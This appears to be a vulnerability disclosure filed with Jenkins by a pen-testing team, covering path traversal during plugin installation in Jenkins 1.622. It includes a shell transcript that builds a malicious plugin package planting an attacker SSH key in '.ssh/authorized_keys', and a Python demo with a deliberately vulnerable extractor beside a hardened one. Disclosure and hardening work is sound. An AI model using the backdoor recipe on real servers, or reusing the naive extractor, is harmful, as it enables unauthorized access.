Submitting as delegate for a Cisco pen-testing team
A vulnerability in the plugin package installation process of Jenkins could allow an authenticated, remote attacker to perform a path traversal attack.
The vulnerability is due to unsafe unpacking of plugin packages. An attacker could exploit this vulnerability by crafting a malicious plugin package and installing it themselves, or by tricking a victim into installing it on their Jenkins instance. A successful exploit could allow the attacker to write or overwrite files with the privileges of the Jenkins process, which could provide backdoor access or cause a denial of service (DoS) condition.
Headline: Path traversal during Jenkins plugin installation
Platforms: Jenkins
Versions: 1.622
CWE Tags: CWE-25, CWE-641
Jenkins allows administrators to install plugins that extend the core
functionality of the system. Plugins are distributed in a single-file package
(essentially a 'zip'/'jar' file) that is expanded at installation time. The
process that expands plugin packages during installation contains a path
traversal vulnerability that allows a malicious plugin package to write files to
arbitrary locations on the underlying filesystem. This includes creating new
files and directories and overwriting existing files.
For example, a plugin package could overwrite Jenkins system configuration files
or cryptographic secrets. It could create new users or jobs by writing new
user/job configuration files. It could even create/overwrite an OS user's
'.ssh/authorized_keys' file, thus creating a backdoor that may allow the
attacker to SSH into the Jenkins server.
Consider the following shell transcript illustrating how an attacker could
create a malicious package that installs an attacker-controlled SSH key.
$ mkdir -p .ssh one/two
$ ssh-keygen -t rsa -b 1024 -N "" -C jenkins -f .ssh/jenkins.id_rsa
Generating public/private rsa key pair.
Your identification has been saved in .ssh/jenkins.id_rsa.
Your public key has been saved in .ssh/jenkins.id_rsa.pub.
The key fingerprint is:
96:6b:2e:0a:bb:07:d5:8d:97:b7:70:bb:4e:65:3f:bb jenkins
The key's randomart image is:
[randomart image omitted]
$ ln -s jenkins.id_rsa.pub .ssh/authorized_keys
$ jar cvf ssh_backdoor.hpi -C one/two/ ../../.ssh/authorized_keys
added manifest
adding: ../../.ssh/authorized_keys(in = 221) (out= 198)(deflated 10%)
Note that the 'ssh_backdoor.hpi' plugin described above has been confirmed to
successfully create an SSH backdoor on Jenkins 1.622 running on Ubuntu Linux
(default installation via aptitude). Differences in installation paths and
filesystem layout (in particular, how many directory levels separate the plugin
expansion directory from the target file) could affect the applicability of
this example to other platforms.
Clearly the behavior described above should not be permitted. To protect
against such attacks, Jenkins developers should ensure that plugins are
unpacked only into the plugin's own directory: each archive entry name should
be resolved to a canonical path and rejected if it is absolute or does not
remain under the intended plugin directory, before any file is written.
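The following Python example is added here to illustrate the unpacking flaw and the check described above; it is not Jenkins code and does not reproduce Jenkins' actual installer. It builds an in-memory package with the same '../../.ssh/authorized_keys' entry as the jar transcript, unpacks it into a constructed directory layout that assumes (as the transcript does) the plugin directory sits two levels below the target home directory, and compares a naive extractor, which writes outside the plugin directory, with a hardened one that canonicalizes every entry path and rejects the package before writing anything. The key material and directory names are constructed for the demonstration.

```python
import io
import os
import tempfile
import zipfile

# Constructed malicious package: manifest plus one entry that climbs two levels up.
# The key text is a placeholder, not a real public key.
MALICIOUS_ENTRIES = {
    "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n",
    "../../.ssh/authorized_keys": "ssh-rsa AAAAB3NzaC1yc2E-constructed-sample-key jenkins\n",
}

# Constructed benign package for comparison.
CLEAN_ENTRIES = {
    "META-INF/MANIFEST.MF": "Manifest-Version: 1.0\n",
    "WEB-INF/classes/hello.txt": "hello\n",
}


def build_hpi(entries: dict) -> bytes:
    """Build a zip/hpi-style package in memory. zipfile stores entry names verbatim,
    so '..' segments survive exactly as 'jar' would store them."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


def unpack_naive(package: bytes, dest: str) -> list:
    """Vulnerable: joins the entry name onto dest and writes wherever that lands."""
    written = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        for info in zf.infolist():
            target = os.path.join(dest, info.filename)  # '..' is honoured by the OS
            if info.filename.endswith("/"):
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(info))
            written.append(os.path.realpath(target))
    return written


def unpack_safe(package: bytes, dest: str) -> list:
    """Hardened: canonicalize every entry first; refuse the whole package if any entry
    (absolute or via '..') would land outside dest, then write."""
    root = os.path.realpath(dest)
    os.makedirs(root, exist_ok=True)
    written = []
    with zipfile.ZipFile(io.BytesIO(package)) as zf:
        infos = zf.infolist()
        # Validation pass: nothing is written until every entry has been checked.
        for info in infos:
            target = os.path.realpath(os.path.join(root, info.filename))
            if os.path.commonpath([root, target]) != root:
                raise ValueError(f"entry escapes target directory: {info.filename}")
        for info in infos:
            target = os.path.realpath(os.path.join(root, info.filename))
            if info.filename.endswith("/"):
                os.makedirs(target, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(target), exist_ok=True)
            with open(target, "wb") as f:
                f.write(zf.read(info))
            written.append(target)
    return written


def demo() -> dict:
    """Constructed layout: <home>/plugins/<plugin>, so '../../' from the plugin
    directory resolves to <home>, standing in for the jenkins user's home."""
    home = tempfile.mkdtemp(prefix="fake-jenkins-home-")
    plugin_dir = os.path.join(home, "plugins", "ssh_backdoor")
    os.makedirs(plugin_dir)
    result = {}

    unpack_naive(build_hpi(MALICIOUS_ENTRIES), plugin_dir)
    escaped = os.path.join(home, ".ssh", "authorized_keys")
    result["naive_wrote_outside"] = os.path.isfile(escaped)

    safe_dir = os.path.join(home, "plugins", "safe")
    try:
        unpack_safe(build_hpi(MALICIOUS_ENTRIES), safe_dir)
        result["safe_rejected"] = None
    except ValueError as e:
        result["safe_rejected"] = str(e)
    # The hardened unpacker wrote nothing before rejecting the package.
    result["safe_dir_empty"] = os.listdir(safe_dir) == []

    clean = unpack_safe(build_hpi(CLEAN_ENTRIES), safe_dir)
    result["safe_clean_ok"] = any(p.endswith("hello.txt") for p in clean)
    return result


if __name__ == "__main__":
    print(demo())
```

The check is done against the canonical (realpath) form of the joined path rather than by looking for a literal '..' substring, so it also catches absolute entry names and mixed forms such as 'a/../../x'; validating every entry before writing any avoids leaving a half-installed package behind when one entry is bad.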
References:
http://cwe.mitre.org/data/definitions/25.html
http://cwe.mitre.org/data/definitions/641.html
Issue links:
causes JENKINS-56931 Correct potential bug in unzip to relative target (Closed)